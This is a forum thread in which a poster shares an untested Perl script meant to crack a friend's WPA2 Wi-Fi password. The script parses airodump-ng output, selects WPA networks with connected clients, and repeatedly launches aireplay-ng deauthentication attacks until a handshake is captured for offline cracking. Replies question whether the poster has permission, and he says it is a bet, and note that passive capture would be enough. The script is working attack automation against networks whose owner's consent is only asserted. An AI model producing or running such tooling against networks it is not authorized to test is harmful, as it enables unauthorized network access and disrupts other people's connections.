Hi,
yesterday I asked a question in Tutorials & Guides without receiving any reply.
I'm supposing that my problem is quite common, so I decided to ... try to solve it.
My problem: my friend has a wireless network protected with WPA2. I read the fantastic guide on how to crack WPA/WPA2 and I tried to use it. The problem is that when I start airodump-ng there are no clients associated to the network. Maybe my friend connects to the network when I'm at work.
How can I solve it?
If I read the guide correctly, it seems that the last part (running aircrack-ng) can be done "offline" when there are no clients associated. The client-dependent part of the whole process is capturing the handshake, and often there are no clients when you want it.
So I wrote a perl script which should help you to find the handshake.
The typical scenario is: in the morning you start a shell in which you prepare your wireless adapter (monitor mode) and start airodump-ng.
From crontab or another shell you start my perl script in the background and then you ... go to work.
The purpose is: when you come back from work, you have a file with the handshake (if during the day your friend connects to his network...) and this lets you continue the cracking process.
I wanted to post the topic in the Tutorials & Guides section but .... I can't write to that section.
I have to paste the script below because I can't find a way to attach a file.
I finished writing the script 5 minutes ago and I'm at work, so I haven't tested it (anyway, there are no dangerous operations...).
Suggestions and enhancements are welcome.
+++++++++++++++++++++++++++
Perl Script
+++++++++++++++++++++++++++
#!/usr/bin/perl
# Author: Spinmar
# Date: 20/06/2008
# -------------------------------
use strict;
use warnings;
use POSIX qw(setsid);
use Getopt::Std;

$| = 1;
my $SLEEP_TIMEOUT = 10;

# Options: -i airodump-ng text output, -o handshake output file, -w wireless adapter
our ($opt_i, $opt_o, $opt_w);
getopt('iow');
if (!defined($opt_i) || !defined($opt_o) || !defined($opt_w)) {
    print STDERR "usage: check_airodump.pl -i <file(\.txt) with option -w in airodump> -o <file_out_wpa_handshake> -w <wireless_adapter>\n";
    exit 1;
}
my $FILE_OUT_AIRODUMP = $opt_i;
if (!-e $FILE_OUT_AIRODUMP) {
    print STDERR "File $FILE_OUT_AIRODUMP doesn't exist!! Please insert absolute path\n";
    exit 1;
}
my $FILE_OUT_HANDSHAKE = $opt_o;
my $WIRELESS_ADAPTER   = $opt_w;
my $BSSID     = '';
my $flag_exit = 0;

# Return the pid of the first running process whose command line contains $name,
# or undef if no such process is running.
sub find_pid {
    my ($name) = @_;
    my $line = `ps aefx | grep '$name' | grep -v grep`;
    return undef if (!defined($line) || length($line) < 5);
    my @tmp = split ' ', $line;      # split ' ' also drops leading blanks before the PID
    return undef if ($#tmp < 2);
    return undef if ($tmp[0] !~ /^\d+$/);
    return $tmp[0];
}

while (1) {
    if ($flag_exit) {
        # Handshake saved: kill airodump-ng and aireplay-ng (it should already be stopped), then exit
        my $pid = find_pid('airodump-ng');
        if (!defined($pid)) {
            print STDERR "No airodump-ng in execution\n";
            exit;
        }
        kill 9, $pid;
        $pid = find_pid('aireplay-ng');
        if (!defined($pid)) {
            print STDERR "[INFO]No aireplay in execution\n";
            exit;
        }
        kill 9, $pid;
        exit;
    }

    my $num     = 0;
    my $station = 0;
    my $pwr     = 0;
    my %list_bssid         = ();   # BSSID -> ESSID (WPA/WPA2 networks only)
    my %list_bssid_station = ();   # BSSID -> associated STATION
    open(FILEHANDLE, "<", $FILE_OUT_AIRODUMP) or die("Error to open file $FILE_OUT_AIRODUMP\n");
    LOOP: while (<FILEHANDLE>) {
        chomp;
        if ($num == 0) {
            # First line: look for the WPA handshake notice
            if ($_ =~ /WPA handshake:\s(.+)$/) {
                # FOUND!!!
                # The handshake output file contains:
                # <BSSID of examined network> - <WPA handshake>
                my $hand_shake = $1;
                open(FILEHANDLE_HS, ">", $FILE_OUT_HANDSHAKE) or die("Error to open file $FILE_OUT_HANDSHAKE\n");
                print FILEHANDLE_HS "$BSSID - $hand_shake\n";
                close(FILEHANDLE_HS);
                $flag_exit = 1;
                last LOOP;
            }
        }
        my @tmp = split ' ', $_;
        if ($#tmp <= 0) {              # blank line or a single word: skip it
            $num++;
            next LOOP;
        }
        if ($tmp[1] eq 'PWR') {
            $pwr = 1;
            $num++;
            next LOOP;
        }
        elsif ($tmp[1] eq 'STATION') {
            $station = 1;
            $pwr     = 0;
            $num++;
            next LOOP;
        }
        else {
            if ($pwr) {
                # Only keep WPA/WPA2 networks: list_bssid = BSSID -> ESSID
                if (defined($tmp[8]) && (($tmp[8] eq 'WPA') || ($tmp[8] eq 'WPA2'))) {
                    $list_bssid{$tmp[0]} = $tmp[$#tmp];
                }
            }
            elsif ($station) {
                my $mac = qr/^\w\w:\w\w:\w\w:\w\w:\w\w:\w\w$/;
                if (($tmp[0] =~ $mac) && ($tmp[1] =~ $mac) && exists($list_bssid{$tmp[0]})) {
                    $list_bssid_station{$tmp[0]} = $tmp[1];
                }
            }
        }
        $num++;
    }
    close(FILEHANDLE);
    next if $flag_exit;   # back to the top of the loop, where the processes are stopped

    # Don't start another deauth while an aireplay-ng process is still running
    my $aireplay_pid = find_pid('aireplay-ng');
    if (!defined($aireplay_pid)) {
        while (my ($key, $value) = each(%list_bssid_station)) {
            $BSSID = $key;
            system("nohup aireplay-ng -0 1 -a $key -c $value $WIRELESS_ADAPTER &");
            # Another way to do this:
            #my $pid = fork();
            #die "Can't fork $!" unless defined $pid;
            #if (!$pid) {
            #    open(STDIN,  "</dev/null");
            #    open(STDOUT, ">/dev/null");
            #    open(STDERR, ">&STDOUT");
            #    exec "aireplay-ng -0 1 -a $key -c $value $WIRELESS_ADAPTER";
            #    exit(0);
            #}
            last;   # only one deauth per cycle
        }
    }
    sleep($SLEEP_TIMEOUT);
}
exit(0);
++++++++++++++++++++++++++++++++++++
End
++++++++++++++++++++++++++++++++++++
Best regards
Couldn't you just leave airodump-ng running until you get home?
And you also asked your "friend" if you can do this? From what you wrote it sounds like you don't have permission.
My friend and I made a bet: I have 5 days to find his password.
The prize is a ... pizza
If I leave airodump-ng running all day and my friend connects when I'm not present, how can I run aireplay-ng?
Yes. Although I admire the scripting effort all you have to do is leave airodump running and when a client connects the handshake is captured.
Aireplay is for deauthing an already connected client from the network and forcing him to reconnect, thus capturing the handshake.
The prize is a ... pizza
Man, get ur ass movin, you can't miss out on this!